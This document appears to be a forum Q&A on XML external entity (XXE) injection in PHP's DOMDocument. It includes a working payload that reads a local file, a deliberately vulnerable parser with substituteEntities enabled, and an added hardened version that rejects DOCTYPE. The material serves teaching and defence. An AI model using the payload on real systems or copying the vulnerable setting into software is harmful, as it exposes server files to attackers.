Please give me a hint why my code is NOT vulnerable to XXE.
code:
<?php
// Reads untrusted XML straight from the POST body and parses it with DOMDocument
$text = $_POST['textarea'];
$doc = new DOMDocument();
$doc->loadXML($text);
// Prints the concatenated text nodes of the parsed document
echo $doc->textContent;
testcase 1:
<justsomexmltag>Hello world</justsomexmltag>
result 1:
Hello world
So far so good. However, when I'm trying to inject XML code to retrieve a local file's content:
<?xml version="1.0"?>
<!DOCTYPE log [
<!ENTITY ent SYSTEM "test.txt">
]>
<log><text>&ent;</text></log>
then nothing is printed. "test.txt" is at the same level in the file structure as the PHP file from which I carry out the attack. I have tried
<!ENTITY ent SYSTEM file:///"test.txt">
as well as
<!ENTITY ent SYSTEM file:///full path to the file>
but to no avail.
test.txt:
This is just a test.
I have also tried:
<test>This is just a test.</test>
No results.
Any hints?
Responding to @Paul Crovella, here's an edit:
Copy-pasting your code resulted in:
DOMDocument::loadXML(): I/O warning : failed to load external entity file:// full path to file name
DOMDocument::loadXML(): Failure to process entity ent in Entity
DOMDocument::loadXML(): Entity 'ent' not defined in Entity
By default libxml will not load external entities precisely to avoid this issue. To convince it to do so you'd need to set either substituteEntities or validateOnParse to true prior to loading. E.g.:
$xml = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE log [
<!ENTITY ent SYSTEM "test.txt">
]>
<log><text>&ent;</text></log>
XML;
$dom = new DOMDocument();
$dom->substituteEntities = true;
$dom->loadXML($xml);
echo $dom->textContent;
Outputs:
This is just a test.
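The answer above shows the switch that makes DOMDocument resolve the external entity. The following is an added example, not code from the question or the answer, that puts that vulnerable parse next to a hardened one. It writes a throwaway file with tempnam() to stand in for test.txt (a constructed input, so it runs anywhere without a fixed path), builds the same payload with an absolute file:// URL, and then parses it twice: once with substituteEntities enabled, which leaks the file, and once through a parseHardened() helper (a name chosen for this example) that refuses any document carrying a DOCTYPE and passes LIBXML_NONET so the parser cannot reach out to the network even if entity substitution is later switched on by mistake.

```php
<?php
// Added example, not part of the original question or answer.
// Demonstrates the XXE read discussed above and one way to block it.

declare(strict_types=1);

// Constructed input: a temporary file standing in for test.txt.
$secretPath = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretPath, 'This is just a test.');

// The same payload as in the thread, with an absolute file:// URL.
$payload = <<<XML
<?xml version="1.0"?>
<!DOCTYPE log [
<!ENTITY ent SYSTEM "file://{$secretPath}">
]>
<log><text>&ent;</text></log>
XML;

// Vulnerable: entity substitution turned on, as in the answer.
function parseVulnerable(string $xml): string
{
    $dom = new DOMDocument();
    $dom->substituteEntities = true;   // same effect as passing LIBXML_NOENT
    $dom->loadXML($xml);
    return $dom->textContent;          // contains the file's contents
}

// Hardened: reject any DTD before and after parsing, never substitute
// entities, and forbid network access during the parse.
function parseHardened(string $xml): string
{
    // Cheap pre-check so the parser never even reads a DTD.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        throw new RuntimeException('DTD/DOCTYPE not allowed');
    }

    $prev = libxml_use_internal_errors(true);   // collect errors, no warnings to output
    try {
        $dom = new DOMDocument();
        // substituteEntities stays at its default of false; LIBXML_NONET blocks
        // http:// and similar fetches for external DTDs or entities.
        if ($dom->loadXML($xml, LIBXML_NONET) === false) {
            throw new RuntimeException('malformed XML');
        }
        // DOMDocument::$doctype is non-null whenever the input carried a <!DOCTYPE>.
        if ($dom->doctype !== null) {
            throw new RuntimeException('DTD/DOCTYPE not allowed');
        }
        return $dom->textContent;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prev);
    }
}

echo "vulnerable: ", parseVulnerable($payload), PHP_EOL;   // leaks "This is just a test."

try {
    echo "hardened: ", parseHardened($payload), PHP_EOL;
} catch (RuntimeException $e) {
    echo "hardened: rejected (", $e->getMessage(), ")", PHP_EOL;
}

// Ordinary input without a DTD still parses normally.
echo "hardened, benign input: ",
     parseHardened('<justsomexmltag>Hello world</justsomexmltag>'), PHP_EOL;

unlink($secretPath);
```

The two checks in parseHardened() are deliberate belt and braces: the string pre-check stops the DTD from being processed at all, and the $doctype check catches anything that slips past it (for example an unusual encoding that defeats the text match). Rejecting DOCTYPE outright is the simplest defence because DOMDocument offers flags to enable DTD features but none to forbid them, so relying on substituteEntities staying false leaves the outcome one configuration change away from the vulnerable version.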